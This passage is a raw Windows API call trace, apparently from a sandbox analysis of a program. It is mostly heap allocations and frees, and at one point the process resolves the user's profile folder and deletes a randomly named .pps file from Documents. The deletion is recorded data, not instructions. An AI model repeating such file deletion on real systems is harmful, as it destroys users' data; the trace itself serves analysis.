lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0266.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0266.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0266.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.150] CloseHandle (hObject=0x268) returned 1 [0266.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0266.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0266.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0266.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0266.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.164] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0266.165] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.166] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0266.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/rq5tKC1of8p4r7HR.pps", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps", lpFilePart=0x8bedfc*="rq5tKC1of8p4r7HR.pps") returned 0x3c [0266.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.169] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rq5tkc1of8p4r7hr.pps")) returned 0x20 [0266.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd1de0, ftCreationTime.dwHighDateTime=0x1d4d40f, ftLastAccessTime.dwLowDateTime=0xcf36a910, ftLastAccessTime.dwHighDateTime=0x1d4cdce, ftLastWriteTime.dwLowDateTime=0xcf36a910, ftLastWriteTime.dwHighDateTime=0x1d4cdce, nFileSizeHigh=0x0, nFileSizeLow=0x71c1, dwReserved0=0x1eaf, dwReserved1=0x4, cFileName="rq5tKC1of8p4r7HR.pps", cAlternateFileName="RQ5TKC~1.PPS")) returned 0xaa5820 [0266.169] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rq5tkc1of8p4r7hr.pps")) returned 1 [0266.170] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd1de0, ftCreationTime.dwHighDateTime=0x1d4d40f, ftLastAccessTime.dwLowDateTime=0xcf36a910, ftLastAccessTime.dwHighDateTime=0x1d4cdce, ftLastWriteTime.dwLowDateTime=0xcf36a910, ftLastWriteTime.dwHighDateTime=0x1d4cdce, nFileSizeHigh=0x0, nFileSizeLow=0x71c1, dwReserved0=0x1eaf, dwReserved1=0x4, cFileName="rq5tKC1of8p4r7HR.pps", cAlternateFileName="RQ5TKC~1.PPS")) returned 0 [0266.171] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0266.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.171] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0266.172] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 